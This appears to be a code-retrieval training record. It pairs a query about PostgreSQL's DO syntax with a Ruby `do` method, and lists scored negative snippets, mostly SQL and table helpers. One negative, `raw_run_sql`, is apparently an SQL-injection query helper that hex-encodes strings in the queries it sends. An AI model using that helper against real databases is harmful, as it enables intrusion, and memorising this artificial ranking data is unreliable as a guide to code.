"def create_or_update_functions(db: EventSourcery::Postgres.config.event_store_database,\n function_name: EventSourcery::Postgres.config.write_events_function_name,\n events_table_name: EventSourcery::Postgres.config.events_table_name,\n aggregates_table_name: EventSourcery::Postgres.config.aggregates_table_name)\n db.run <<-SQL\ncreate or replace function #{function_name}(_aggregateId uuid,\n _eventTypes varchar[],\n _expectedVersion int,\n _bodies json[],\n _createdAtTimes timestamp without time zone[],\n _eventUUIDs uuid[],\n _correlationIds uuid[],\n _causationIds uuid[],\n _lockTable boolean) returns void as $$\ndeclare\ncurrentVersion int;\nbody json;\neventVersion int;\neventId text;\nindex int;\nnewVersion int;\nnumEvents int;\ncreatedAt timestamp without time zone;\nbegin\nnumEvents := array_length(_bodies, 1);\nselect version into currentVersion from #{aggregates_table_name} where aggregate_id = _aggregateId;\nif not found then\n -- when we have no existing version for this aggregate\n if _expectedVersion = 0 or _expectedVersion is null then\n -- set the version to 1 if expected version is null or 0\n insert into #{aggregates_table_name}(aggregate_id, version) values(_aggregateId, numEvents);\n currentVersion := 0;\n else\n raise 'Concurrency conflict. Current version: 0, expected version: %', _expectedVersion;\n end if;\nelse\n if _expectedVersion is null then\n -- automatically increment the version\n update #{aggregates_table_name} set version = version + numEvents where aggregate_id = _aggregateId returning version into newVersion;\n currentVersion := newVersion - numEvents;\n else\n -- increment the version if it's at our expected version\n update #{aggregates_table_name} set version = version + numEvents where aggregate_id = _aggregateId and version = _expectedVersion;\n if not found then\n -- version was not at expected_version, raise an error.\n -- currentVersion may not equal what it did in the database when the\n -- above update statement is executed (it may have been incremented by another\n -- process)\n raise 'Concurrency conflict. Last known current version: %, expected version: %', currentVersion, _expectedVersion;\n end if;\n end if;\nend if;\nindex := 1;\neventVersion := currentVersion + 1;\nif _lockTable then\n -- Ensure this transaction is the only one writing events to guarantee\n -- linear growth of sequence IDs.\n -- Any value that won't conflict with other advisory locks will work.\n -- The Postgres tracker currently obtains an advisory lock using it's\n -- integer row ID, so values 1 to the number of ESP's in the system would\n -- be taken if the tracker is running in the same database as your\n -- projections.\n perform pg_advisory_xact_lock(-1);\nend if;\nforeach body IN ARRAY(_bodies)\nloop\n if _createdAtTimes[index] is not null then\n createdAt := _createdAtTimes[index];\n else\n createdAt := now() at time zone 'utc';\n end if;\n\n insert into #{events_table_name}\n (uuid, aggregate_id, type, body, version, correlation_id, causation_id, created_at)\n values\n (\n _eventUUIDs[index],\n _aggregateId,\n _eventTypes[index],\n body,\n eventVersion,\n _correlationIds[index],\n _causationIds[index],\n createdAt\n )\n returning id into eventId;\n\n eventVersion := eventVersion + 1;\n index := index + 1;\nend loop;\nperform pg_notify('new_event', eventId);\nend;\n$$ language plpgsql;\nSQL\n end",
"def trigger(event, opts = {})\n trigger!(event, opts)\n rescue Socky::Client::Error => e\n Socky::Client.logger.error(\"#{e.message} (#{e.class})\")\n Socky::Client.logger.debug(e.backtrace.join(\"\\n\"))\n false\n end",
"def enable_event_trigger(name, options = {})\n if options[:always] && options[:replica]\n raise ArgumentError.new(\"Cannot use :replica and :always together when enabling an event trigger.\")\n end\n\n sql = \"ALTER EVENT TRIGGER #{quote_generic(name)} ENABLE\"\n\n if options[:always]\n sql << ' ALWAYS'\n elsif options[:replica]\n sql << ' REPLICA'\n end\n\n execute \"#{sql};\"\n end",
"def create_table_actions atable, todo, data, categ\n #@new_act = Action.new(\"New Row\", \"mnemonic\"=>\"N\") { \n @new_act = Action.new(\"&New Row\") { \n cc = atable.get_table_column_model.column_count\n if atable.row_count < 1\n categ = nil\n frow = 0\n else\n frow = atable.focussed_row\n categ = atable.get_value_at(frow,1)\n frow += 1\n end\n tmp = [nil, categ, \"\", 5, \"\", \"TODO\", Time.now]\n tm = atable.table_model\n tm.insert frow, tmp\n atable.set_focus_on frow\n @status_row.text = \"Added a row. Please press Save before changing Category.\"\n alert(\"Added a row below current one. Use C-k to clear task.\")\n }\n @new_act.accelerator \"Alt-N\"\n @save_cmd = lambda {\n todo.set_tasks_for_category categ, data\n todo.dump\n alert(\"Rewritten yaml file\")\n }\n @del_cmd = lambda { \n row = atable.focussed_row\n if confirm(\"Do your really want to delete row #{row+1}?\")== :YES\n tm = atable.table_model\n tm.delete_at row\n else\n @status_row.text = \"Delete cancelled\"\n end\n }\n\n end",
"def create_event_store(db: EventSourcery::Postgres.config.event_store_database,\n events_table_name: EventSourcery::Postgres.config.events_table_name,\n aggregates_table_name: EventSourcery::Postgres.config.aggregates_table_name,\n write_events_function_name: EventSourcery::Postgres.config.write_events_function_name)\n create_events(db: db, table_name: events_table_name)\n create_aggregates(db: db, table_name: aggregates_table_name)\n create_or_update_functions(db: db, events_table_name: events_table_name, function_name: write_events_function_name, aggregates_table_name: aggregates_table_name)\n end",
"def create(table_name, attributes)\n\n # Perform the creation and returns the id\n Operations::Create.new(@rforce_binding, table_name, attributes).run()\n\n end",
"def update_function(name, args)\n version = args[:version]\n sql_definition = args[:sql_definition]\n revert_to_version = args[:revert_to_version]\n\n if version.nil? && sql_definition.nil?\n raise(\n ArgumentError,\n \"version or sql_definition must be specified\",\n )\n end\n\n sql_definition = sql_definition.strip_heredoc if sql_definition\n sql_definition ||= Fx::Definition.new(\n name: name,\n version: version,\n ).to_sql\n\n Fx.database.update_function(name, sql_definition)\n end",
"def initialize( table, columns, opts = {} )\n @table = table\n @columns = [ *columns ]\n @opts = opts\n end",
"def create(tablename)\n #allow us to pass either a single symbol or an array of symbols.\n if Symbol === tablename\n tablename = [tablename]\n end\n\n tablename.each do |table|\n #standard creation protocol.\n $BS.create table\n\n #here is the reflective magic. Defined below in this list is this thingy.\n $BS.connect {|db| eval \"data_#{table} db\"}\n end\n\n $BS\nend",
"def make_table(table, *args, others)\n unless others.is_a? Hash\n args << others\n others = {}\n end\n table = table.to_s # probably already was\n table_sym = table.to_sym\n @fields[table_sym] = args + others.keys\n @xform[table_sym] = {:inspect => [], :yaml => []}\n xform, fields = @xform, @fields # because of change in 'self'\n @db.create_table table_sym do\n primary_key table+\"_id\"\n args.each do |field| \n if field.to_s =~ /_id$/\n Integer field \n else\n String field\n end\n end\n others.each_pair do |field, klass|\n case klass.to_s.to_sym\n when :Integer; Integer field\n when :String; String field\n when :Float; Float field\n when :DateTime; DateTime field\n when :Array, :Hash, :Symbol\n String field\n xform[table_sym][:inspect] << field\n when :Yaml\n String field\n xform[table_sym][:yaml] << field\n end\n end\n end\n # Now save metadata...\n args_hash = {}\n args.each {|arg| args_hash.update(arg => :String) }\n args_hash.update(others)\n args_hash.each_pair {|k, v| args_hash[k] = v.to_s.to_sym }\n @db[:metadata].insert(:table => table, :transform => xform[table_sym].to_yaml, \n :fields => fields[table_sym].to_yaml)\n end",
"def triggers\n\n end",
"def create_patient_table(options_table)\n options_table.raw.each do |row|\n case row[0].downcase\n when 'first name'\n first_name.set row[1]\n when 'last name'\n last_name.set row[1]\n when 'email'\n sleep 1\n email.set row[1]\n when 'date of birth'\n sleep 3\n dob.click\n dob.set row[1]\n sleep 1\n when 'ref physician'\n ref_physician.set row[1]\n when 'gender'\n gender_dropdown.click\n sleep 2\n gender_select.each do |gen|\n gen.click if gen.text == row[1]\n end\n when 'physician'\n physician_dropdown.click\n physician_select.each do |phy|\n phy.click if phy.text == row[1]\n end\n when 'office location'\n office_location_dropdown.click\n office_select.each do |ol|\n ol.click if ol.text == row[1]\n end\n when 'clinic_mode_email'\n clinic_mode_email.set row[1]\n when 'clinic_mode_physician'\n clinic_mode_physician_dropdown.click\n physician_select.each do |phy|\n phy.click if phy.text == row[1]\n end\n\n else\n raise \"Option #{row[0]} is not a valid argument\"\n end\n end\n end",
"def create_table(name, &block)\n g = Schema::Generator.new(self, &block)\n create_table_sql_list(name, *g.create_info).each {|sql| execute(sql)}\n end",
"def insert_table_definition(args)\r\n\r\n submission_database_id = nil\r\n submission = args[:submission]\r\n form_definition = args[:form_definition]\r\n form_table_name = args[:form_table_name]\r\n kapp_slug = args[:kapp_slug]\r\n form_slug = args[:form_slug]\r\n\r\n table_def_name = \"table_definitions\"\r\n\r\n #Table definition generation.\r\n @db.transaction(:retry_on => [Sequel::SerializationFailure]) do\r\n\r\n # Once the table has been created/modified/verified, insert the submission into the table\r\n db_submission = {\r\n :tableName => form_table_name,\r\n :kappSlug => kapp_slug,\r\n :formSlug => form_slug,\r\n :formName => form_definition['name']\r\n }\r\n\r\n puts \"Upserting the table definition for the table '#{form_table_name}' into '#{table_def_name}'\" if @enable_debug_logging\r\n db_submissions = @db[table_def_name.to_sym]\r\n if db_submissions.select(:tableName).where(:tableName => form_table_name).count == 0 then\r\n submission_database_id = db_submissions.insert(db_submission)\r\n else\r\n submission_database_id = db_submissions.where(:tableName => form_table_name).update(db_submission) unless @info_values['ignore_updates']\r\n end\r\n end\r\n\r\n submission_database_id\r\n\r\n end",
"def create_table\n raise \"Need to implement abstract method.\" \n end",
"def _save(opts)\n pk = nil\n called_save = false\n called_cu = false\n around_save do\n called_save = true\n before_save\n\n if new?\n around_create do\n called_cu = true\n before_create\n pk = _insert\n @this = nil\n @new = false\n @modified = false\n pk ? _save_refresh : changed_columns.clear\n after_create\n true\n end\n raise_hook_failure(:around_create) unless called_cu\n else\n around_update do\n called_cu = true\n before_update\n columns = opts[:columns]\n if columns.nil?\n columns_updated = if opts[:changed]\n @values.reject{|k,v| !changed_columns.include?(k)}\n else\n _save_update_all_columns_hash\n end\n changed_columns.clear\n else # update only the specified columns\n columns = Array(columns)\n columns_updated = @values.reject{|k, v| !columns.include?(k)}\n changed_columns.reject!{|c| columns.include?(c)}\n end\n _update_columns(columns_updated)\n @this = nil\n @modified = false\n after_update\n true\n end\n raise_hook_failure(:around_update) unless called_cu\n end\n after_save\n true\n end\n raise_hook_failure(:around_save) unless called_save\n self\n end",
"def create_queries\n gen_rulename\n [\"\n -- FN for sync updates \n CREATE FUNCTION fn_#{suffix}()\n RETURNS TRIGGER\n LANGUAGE plpgsql\n AS $function$\n BEGIN\n UPDATE #{dest_table}\n SET #{ cols.map{|src, dest| \"\\\"#{dest}\\\" = NEW.\\\"#{src}\\\"\" }.join(', ') }\n WHERE \\\"#{map_dest}\\\" = NEW.\\\"#{map_src}\\\";\n RETURN NULL;\n END;\n $function$;\",\n \"\n -- TR for sync updates\n CREATE TRIGGER tr_#{suffix}\n AFTER INSERT OR UPDATE ON #{src_table} \n FOR EACH ROW EXECUTE PROCEDURE fn_#{suffix}();\",\n \"\n -- FN for cleaner\n CREATE FUNCTION fn_#{suffix}_cleaner()\n RETURNS TRIGGER\n LANGUAGE plpgsql\n AS $function$\n BEGIN\n IF OLD.sid = #{sid_src} OR OLD.sid = #{sid_dest} THEN\n #{delete_queries.join(' ')}\n END IF;\n RETURN NULL;\n END;\n $function$;\",\n \"\n -- TR for cleaner\n CREATE TRIGGER tr_#{suffix}_cleaner\n AFTER DELETE ON #{surveys_table}\n FOR EACH ROW EXECUTE PROCEDURE fn_#{suffix}_cleaner();\n \"]\n end",
"def initialize(table, columns, values, opts = {})\n @table = table.to_sym\n @opts = opts\n @sql_insert = ::MultiInsert::QueryBuilder.insert(table, columns, values, opts)\n end",
"def alter_table(name, &block)\n g = Schema::AlterTableGenerator.new(self, &block)\n alter_table_sql_list(name, g.operations).each {|sql| execute(sql)}\n end",
"def crud_table(*attrs, &block)\n if block_given?\n list_table(*attrs, &block)\n else\n attrs = attrs_or_default(attrs) { default_attrs }\n list_table(*attrs) do |t|\n add_table_actions(t)\n end\n end\n end",
"def method_missing(name, *args)\n if args.empty?\n super\n else\n @table[\"_function_\"] = _klass_new(name, *args)\n end\n end",
"def create_table(*params)\n connection.create_table(*params) {}\n end",
"def table(table)\n @table = table\n\n @aliased_table = @table.new(@table.table_name)\n end",
"def show_create_table(db, table)\n end",
"def after_create(record)\n contents = to_sql_insert(record)\n to_logfile(contents)\n # Send a notification to the admin, if requested:\n if @email_on_create\n AgexMailer.action_notify_mail(\n record.respond_to?(:user) ? record.user : nil,\n \"#{@table_name} row CREATED\",\n contents\n ).deliver\n end\n end"
] |
[
"0.75036204",
"0.71252567",
"0.71252567",
"0.6725345",
"0.63516825",
"0.6272723",
"0.59450215",
"0.5315169",
"0.51494783",
"0.5082",
"0.506205",
"0.5035983",
"0.50323826",
"0.49635643",
"0.49058893",
"0.48846143",
"0.4867852",
"0.48573887",
"0.48499548",
"0.4799055",
"0.47917128",
"0.4787895",
"0.47744462",
"0.47735012",
"0.47432178",
"0.47263667",
"0.47195897",
"0.47111592",
"0.47080654",
"0.46784398",
"0.4677261",
"0.46649727",
"0.46496737",
"0.4644022",
"0.45878473",
"0.45709145",
"0.45708746",
"0.45667443",
"0.45645747",
"0.45630127",
"0.45556417",
"0.45480636",
"0.45472473",
"0.4542391",
"0.4520883",
"0.44978598",
"0.44920057",
"0.4440992",
"0.44205973",
"0.43964526",
"0.43925396",
"0.43875486",
"0.4346404",
"0.43249118",
"0.43176493",
"0.43161243",
"0.43123215",
"0.43078655",
"0.4300772",
"0.42933765",
"0.4275939",
"0.42754638",
"0.42551497",
"0.42549935",
"0.42468065",
"0.42398638",
"0.42257556",
"0.4217697",
"0.42112157",
"0.4200109",
"0.41949332",
"0.41795617",
"0.41725886",
"0.41626713",
"0.41549644",
"0.41525912",
"0.41473264",
"0.41429833",
"0.4142794",
"0.4140519",
"0.41322833",
"0.41173232",
"0.4116002",
"0.4109779",
"0.41069752",
"0.4106234",
"0.40993768",
"0.40953338",
"0.4076184",
"0.40749967",
"0.40747947",
"0.4073264",
"0.40675482",
"0.4056791",
"0.40531603",
"0.40491274",
"0.4048724",
"0.4048499",
"0.40468004",
"0.40464306"
] |
0.77001125
|
0
|
Use PostgreSQL's DO syntax to execute an anonymous code block. The code should be the literal code string to use in the underlying procedural language. Options: :language :: The procedural language the code is written in. The PostgreSQL default is plpgsql. Can be specified as a string or a symbol.
|
def do(code, opts=OPTS)
language = opts[:language]
run "DO #{"LANGUAGE #{literal(language.to_s)} " if language}#{literal(code)}"
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def block_code(code, language)\n code\n end",
"def code(lang, &block)\n source_code = capture(&block).strip\n eval('_erbout', block.binding).concat %Q(<pre class=\"CodeRay\"><code class=\"language-#{lang}\">#{html_escape source_code}</code></pre>)\nend",
"def block_code(code, language)\n if language.present?\n CodeRay.scan(code, language).div\n else\n \"<pre><code>#{code}</code></pre>\"\n end\n end",
"def block_code(code, language)\n # highlight some code with a given language lexer \n # and formatter: html or terminal256 \n # and block if you want to stream chunks\n # github.com/jayferd/rouge/blob/master/lib/rouge.rb#L17\n Rouge.highlight(code, language || 'text', 'html') \n # watch out you need to provide 'text' as a default, \n # because when you not provide language in Markdown \n # you will get error: <RuntimeError: unknown lexer >\n end",
"def inline_code; end",
"def run(code)\n eval(code, binding)\n end",
"def create_proc(name, columns=[], options={}, &block)\n if select_value(\"SELECT count(oid) FROM pg_language WHERE lanname = 'plpgsql' \",\"count\").to_i == 0\n# execute(\"CREATE FUNCTION plpgsql_call_handler() RETURNS language_handler AS '$libdir/plpgsql', 'plpgsql_call_handler' LANGUAGE c\")\n execute(\"CREATE TRUSTED PROCEDURAL LANGUAGE plpgsql HANDLER plpgsql_call_handler\")\n end\n\n if options[:force]\n drop_proc(name, columns) rescue nil\n end\n\n if block_given?\n execute get_proc_query(name, columns, options) { yield }\n elsif options[:resource]\n execute get_proc_query(name, columns, options)\n else\n raise StatementInvalid.new(\"Missing function source\")\n end\n end",
"def run_sql(sql)\n connection = PG.connect(dbname: \"facebook_lab\", host: \"localhost\")\n result = connection.exec(sql)\n connection.close\n result\nend",
"def create_proc(name, columns=[], options={}, &block)\n if select_value(\"SELECT count(oid) FROM pg_language WHERE lanname = 'plpgsql' \",\"count\").to_i == 0\n execute(\"CREATE FUNCTION plpgsql_call_handler() RETURNS language_handler AS '$libdir/plpgsql', 'plpgsql_call_handler' LANGUAGE c\")\n execute(\"CREATE TRUSTED PROCEDURAL LANGUAGE plpgsql HANDLER plpgsql_call_handler\")\n end\n\n if options[:force]\n drop_proc(name, columns) rescue nil\n end\n\n if block_given?\n execute get_proc_query(name, columns, options) { yield }\n elsif options[:resource]\n execute get_proc_query(name, columns, options)\n else\n raise StatementInvalid.new(\"Missing function source\")\n end\n end",
"def make_statement\n end",
"def make_statement\n end",
"def gql(options = {}, &block)\n unless @gql\n\n if block_given?\n @gql = Gql::Gql.new(self, &block)\n else\n @gql = Gql::Gql.new(self)\n @gql.prepare if options.fetch(:prepare, true)\n end\n @gql.sandbox_mode = options.fetch(:sandbox_mode, :sandbox)\n end\n @gql\n end",
"def run_sql(sql)\n\tdb = PG.connect(dbname: 'address_book', host: 'localhost')\n\tresult = db.exec(sql)\n\tdb.close\n\tresult\nend",
"def compile(code, force=false)\r\n raise DBGeni::NotImplemented\r\n end",
"def with_script_compiler(&block)\n in_environment do |env|\n env.with_script_compiler(&block)\n end\n end",
"def block_code(code, language)\n \n lines=code.split(\"\\n\")\n lines.map! do |line|\n\n line=line.gsub(/\\&.squo;/, \"'\")\n line=line.gsub(/\\&.dquo;/, '\"')\n line=line.gsub(/</, \"<\")\n line=line.gsub(/>/, \">\")\n\n # Adding my own special coloring scheme for comments and outputs\n # (for which I've added my own special markup sequence, -->\n line=line.gsub(/(\\# .*$)/, \"<span.ps.class='comment'>\\\\1</span>\")\n line=line.gsub(/\\=\\=> (.*$)/, \"<span.ps.class='output'>\\\\1</span>\")\n\n # Kludgy way of only replacing spaces outside the HTML tags I'm adding to get comments\n # to be in a span of their own\n line=line.gsub(/ /, \" \")\n line=line.gsub(/\\.ps\\./, \" \")\n\n if /lt;/.match(line)\n puts \">>> #{line}\"\n end\n\n line\n end\n html_inner = lines.join(\"<br/>\\n\")\n\n html=\"<div class=mycode>\\n#{html_inner}\\n</div>\\n\"\n end",
"def emit_code value\n statement :code, value\n end",
"def roby_execute(&block)\n execution_engine.execute(&block)\n end",
"def run_sql(sql)\n conn = PG.connect(dbname: \"memetube\", host: \"localhost\")\n begin\n result = conn.exec(sql)\n ensure\n conn.close\n end\n result\nend",
"def parse_lang_for_codeblock(source); end",
"def code\n str = Indentation.get\n str << \"var #{name} = function(#{@parameters.join(', ')}) {\\n\"\n Indentation.indent { str << \"#{block}\\n\" }\n str << \"#{Indentation.get}};\\n\"\n str\n end",
"def boring_parrot(statement)\n statement\nend",
"def run_sql(sql)\n conn = PG.connect(dbname: 'movies')\n result = conn.exec(sql)\n conn.close\n result\nend",
"def _run (expr)\n _ruby_eval expr\n end",
"def run_code(code)\n @output.puts # spacer\n begin\n @output.puts \" BEGIN DEBUG \".center(WIDTH, '=')\n eval(code.join(\"\\n\")) # Need to join, since +code+ is an Array.\n @output.puts \" END DEBUG \".center(WIDTH, '=')\n rescue Exception => error\n @output.puts \" DEBUG FAILED \".center(WIDTH, '=')\n @output.puts error\n end\n @output.puts # spacer\n end",
"def run_sql(sql)\n conn = PG.connect(dbname: 'goodfoodhunting')\n result = conn.exec(sql)\n conn.close\n return result\nend",
"def call(code, options = T.unsafe(nil)); end",
"def run_code(code)\n begin\n return eval(code)\n rescue\n return \"Error: Code doesn't run!\"\n end\n end",
"def block_code(code, language)\n sha = Digest::SHA1.hexdigest(code)\n Rails.cache.fetch ['code', language, sha].join('-') do\n Pygments.highlight(code, lexer:language)\n end\n end",
"def execute(&block)\n DSLHelper.new(Class => [:&, :|, :not]) do\n Kernel.load(File.join(File.dirname(__FILE__), 'dsl_ruby_extensions.rb'))\n self.instance_eval(&block)\n end\n end",
"def lambdasaurus(some_code)\n\tputs \"I am a header\"\n\tsome_code.call\n\tputs \"I am a footer\"\nend",
"def bob_code(options={}, &block)\n # if the only string is give, it must be filename by default\n if options.is_a? String\n f = options\n options = {}\n options[:filename] = f \n end\n if block_given?\n code = capture(&block)\n options[:brush] ||= :plain\n else\n unless options[:brush]\n # determine the brush from the filename\n if options[:filename]\n options[:brush] = case File.extname(options[:filename]).downcase\n when '.rb'\n :ruby\n when '.sh', '.ksh', '.csh'\n :shell\n when '.as3'\n :as3\n when '.cf'\n :cf\n when '.c#'\n :csharp\n when '.cpp', '.c'\n :cpp\n when '.css'\n :css\n when '.pas'\n :pascal\n when '.diff'\n :diff\n when '.erl'\n :elang\n when '.js'\n :javascript\n when '.java'\n :java\n when '.pl'\n :perl\n when '.php', '.php3'\n :php\n when '.txt'\n :plain\n when '.ps'\n :powershell\n when '.py', '.jy'\n :python\n when '.scala'\n :scala\n when '.sql'\n :sql\n when '.vb', '.vbs'\n :vb\n when '.xml', '.xhtml', '.xslt', '.html', '.xhtml'\n :xml\n else \n :plain # default value\n end\n end\n end\n code = raw File.read(Rails.root.join('code', options[:filename]))\n end\n s = raw \"<pre class=\\\"brush: #{options[:brush]}; highlight: #{options[:highlight_lines]}\\\">\"\n s += code\n s += raw '</pre>'\n end",
"def code; end",
"def code; end",
"def code; end",
"def code; end",
"def code; end",
"def code; end",
"def code; end",
"def as_code(text)\n '/code ' + sanitze_for_chat(text)\n end",
"def block(sexp)\n statements(sexp)\n end",
"def execute_sql(sql_code)\n done = system \"sh db_execute.sh \\\"#{sql_code}\\\"\"\n raise Exception.new(\"Issue executing sql code: #{sql_code}\") unless done\nend",
"def process(code, context)\n compiler = Verneuil::Compiler.new\n program = compiler.compile(code)\n # p program\n Verneuil::Process.new(program, context)\nend",
"def codeblock\n H[:pre, attr, H[:code, value]]\n end",
"def ruby(&block)\n @ruby_block = block\n end",
"def qux ( &block )\n yield\n return 'qux: post proc'\nend",
"def run_sql(sql)\n #connect to the|db|\n conn = PG.connect(:dbname => 'rogbloll')\n\n\n #execute the db in the argument\n res = conn.exec(sql)\n\n #now close the db\n conn.close\n\n #now return the result of the query...\n res\n\n\n \n end",
"def run_sql(sql)\n db = PG.connect(:dbname => 'movies', :host => 'localhost')\n result = db.exec(sql)\n db.close\n result\n end",
"def compile_block(scope, *exp)\n compile_do(scope, *exp[1])\n end",
"def compile_block(scope, *exp)\n compile_do(scope, *exp[1])\n end",
"def execute(opts = T.unsafe(nil), &block); end",
"def block_code(text, lang=\"\")\n lang ||= lang.to_s\n result = \"```#{lang}\\n\"\n if lang.match RUBY_LANG\n result << ColorCode::Ruby.new(text).colorize\n else\n result << ColorCode::Unknown.new(text).colorize\n end\n result << \"```\\n\"\n result\n end",
"def run(code)\n\t\t\t@interpreter.run(code)\n\t\tend",
"def execute_ruby(code)\n keywords = / class | module | def | do | while | for /\n if code =~ keywords\n return \"Unmatched ends\" if code.scan(keywords).length != code.scan(/end(\\s|$)/).length\n end\n return \"Unmatched..\" if code.scan(/\\{|\\(|\\[/).length != code.scan(/\\}|\\)|\\]/).length\n return \"Unmatched quotes..\" if code.scan(/\\\"|\\'/).length % 2 != 0\n begin\n eval(code[1..-1]) || \"nil\"\n rescue => e\n \"Fail => #{e}\"\n end\n end",
"def do_it(code)\n eval(code)\nrescue \n puts \"Cannot do it!\"\nend",
"def run_sql(sql)\n\tconn = PG.connect(dbname: \"video_store\", host: 'localhost')\n\tresult = conn.exec(sql)\n\tconn.close\n\tresult \nend",
"def code_block(str, language = nil, max_len = -1)\n if max_len > 0\n max_len -= code_block_builder('', language).length # Subtract markdown overhead\n str = str[0..max_len-1] if str.length > max_len\n end\n @result << code_block_builder(str, language)\n end",
"def compile_do_statement\n write_tag '<doStatement>'\n consume(TokenType::DO)\n compile_subroutine_call\n consume(';')\n write_tag '</doStatement>'\n end",
"def execute_in_sandbox(code)\n test_name = \"#{File.dirname(__FILE__)}/am-quoting-test.#{$$}.rb\"\n res_name = \"#{File.dirname(__FILE__)}/am-quoting-test.#{$$}.out\"\n\n File.open(test_name, \"w+\") do |file|\n file.write(<<-CODE)\n block = Proc.new do\n #{code}\n end\n puts block.call\n CODE\n end\n\n system(\"ruby #{test_name} > #{res_name}\") or raise \"could not run test in sandbox\"\n File.read(res_name).chomp\n ensure\n File.delete(test_name) rescue nil\n File.delete(res_name) rescue nil\n end",
"def call\n eval(@code)\n end",
"def run_code(code)\n codemirror_send_keys(find('#scratchpad-editor-wrapper'), code)\n find_button('__papyros-run-code-btn', disabled: false).click\n end",
"def parse_codeblock; end",
"def run_sql(sql_query)\n\tconn = PG.connect(dbname: 'first_crud_app')\n\tresult = conn.exec(sql_query)\n\tconn.close\n\tresult\nend",
"def compile()\n self._compiled = <<\"JAVASCRIPT\"\n(function(repl) {\n try {\n var rc;\n #{code.join(' ')}\n repl.rc_ok(rc);\n } catch(e) {\n repl.rc_fail(e.name, e.message ? e.message : e);\n };\n})(#{replid});\nJAVASCRIPT\n self._code = []\n end",
"def highlight(code, lang, options = T.unsafe(nil)); end",
"def run_sql(sql)\n db = PG.connect(dbname: 'goodfoodhunting')\n results = db.exec(sql)\n db.close\n results\nend",
"def exec_sql_script_in_db(db_name, db_user, db_pass, sql_script)\n # connecting to the given database\n conn = PG.connect(\n :dbname => db_name,\n :user => db_user,\n :password => db_pass)\n\n # actually executing the script\n conn.exec(sql_script)\nend",
"def statement; end",
"def highlight(code, options = T.unsafe(nil)); end",
"def sql(string)\n ::Arel::Nodes::SqlLiteral.new(string)\n end",
"def exec(connection = @connection)\n connection.exec(statement)\n end",
"def add_code(cheatsheet_db, language, type, code, comment)\n cheatsheet_db.execute(\"INSERT INTO #{language} (type, code, comment) VALUES (?, ?, ?)\", [type, code, comment])\nend",
"def run_sql_script(path, adapter = dss, ctx = {})\n sql = ErbHelper.new.process(path, ctx)\n puts sql\n adapter.run sql\n end",
"def code_start(language, caption)\n if caption.nil?\n caption_command = ''\n else\n replaced_caption = replace_inline_content(caption)\n caption_command = \"title={\\\\fontfamily{phv}\\\\selectfont\\\\textbf{#{replaced_caption}}},aboveskip=-0.4 \\\\baselineskip,\"\n end\n\n @io << @templates[:code_start].result(binding)\n end",
"def code_start(language, caption)\n\n if language == 'console'\n column_style = 'columns=fixed,'\n else\n column_style = ''\n end\n\n if caption.nil?\n caption_command = ''\n else\n caption_command = \"title={#{caption}},aboveskip=-0.4 \\\\baselineskip,\"\n end\n\n @io << @templates[:code_start].result(binding)\n end",
"def execute(&block)\n\tblock\nend",
"def execute(&block)\n\tblock\nend",
"def code_for(behavior)\n code = behavior.to_ruby\n code = code.gsub(/^proc \\{/, '')\n code = code.gsub(/\\}$/, '')\n \n # TODO_VERY_SOON: Remove spaces and junk from lines\n \n # TODO: Maybe one day switch all the {} procs \n # to do/end if they're multi-line\n \n code\n end",
"def compile_do\n create_statement\n @stack << top.add_element('doStatement')\n last_token = nil\n i = 0\n while(last_token != '(')\n type, token = get_token(i)\n top.add_element(type).text = token\n i += 1\n last_token = token\n end\n i = compile_do_expression(i)\n while(last_token != ';')\n type, token = get_token(i)\n top.add_element(type).text = token\n i += 1\n last_token = token\n end\n @token_idx += i - 1\n @stack.pop\n end",
"def ruby_code(obj); end",
"def compile_code(*jsstmts)\n code *jsstmts\n compile\n end",
"def execute(&block)\n block.call\n end",
"def execute(&block)\n block.call\n end",
"def do_compile code, do_eval=true\n\t\t\t@cf.cfp_logger.trace TRACE_ENGINE,\"Compiling #{code.fn} action #{code.action}\"\n\t\t\tbegin\n\t\t\t\t# Translate Cfruby style code into plain Ruby\n\t\t\t\ttranslator = Cfp_Translate.new(@cf,@parser)\n\t\t\t\t# Translate conditional blocks\n\t\t\t\tlines = translator.conditionals(code)\n\t\t\t\t# Line by line translation, depending on function - i.e. control, files, tidy etc.\n\t\t\t\ttranslated_lines = []\n\t\t\t\t# code.each do | line,num |\n\t\t\t\tlines.each do | line |\n\t\t\t\t\ttranslated_lines.push translator.do_translate(code.action,line)\n\t\t\t\tend\n\t\t\t\t# Encapsulate teh code into a class object\n\t\t\t\tbuf = code.encapsulate(translated_lines).join(\"\\n\")\n\t\t\t\t@cf.cfp_logger.trace TRACE_ALL,buf\n\t\t\t\teval buf if do_eval\n\t\t\trescue SyntaxError, RuntimeError\n\t\t\t\tmsg = 'ERROR cfscript ',code.fn,\" line #{code.linenum} - #{$!}\\n\"\n\t\t\t\tcode.dump\n\t\t\t\t@cf.cfp_logger.error LOG_CRIT,msg,'cfruby'\n\t\t\t\traise\n\t\t\tend\n\t\t\tbuf\n\t\tend",
"def execute(node)\n message = operation.piggyback(concern.command(database))\n node.process(message)\n end",
"def comment_code\n block_match = /\\{([^\\{\\}]*)\\}/\n matches = @code.scan(block_match)\n return if matches.size != 1\n \n block = matches[0][0].to_s\n @code.gsub!(block_match, \"{\\n#{comment_struct_list(block)}#{@indent}}\")\n end",
"def execute(sql)\n begin\n db = SQLite3::Database.new(@@db_file)\n @@_set_db_handler.call(db)\n if block_given?\n db.execute(sql) do |row|\n yield row\n end\n else\n return db.execute(sql)\n end\n ensure\n db.close\n end\n end",
"def sql_with_postgres_pgp(event)\n filter = /(pgp_sym_(encrypt|decrypt))\\(((.|\\n)*?)\\)/i\n\n event.payload[:sql] = event.payload[:sql].gsub(filter) do |_|\n \"#{$1}([FILTERED])\"\n end\n\n sql_without_postgres_pgp(event)\n end",
"def code_point; end",
"def source=(statement); end",
"def eval\n execute\n end",
"def transpile(code, options = {})\n @js_code = code\n Node.exec(generate_source(options))\n end",
"def raw_run_sql(query)\n vprint_status \"{SQLi} Executing (#{query})\"\n if @hex_encode_strings\n query = hex_encode_strings(query)\n vprint_status \"{SQLi} Encoded to (#{query})\"\n end\n @query_proc.call(query)\n end",
"def execute_code source\n source.execute(@scope)\n rescue Exception => e\n message, name = @exception_service.get_exception_message(e)\n puts \"#{name}: #{message}\"\n end",
"def exec(command, &block); end",
"def map_statements!(&ruby_block)\n @statements.map! do |stmnt|\n stmnt = ruby_block.call(stmnt)\n stmnt.parent = self unless stmnt.parent\n stmnt\n end\n end",
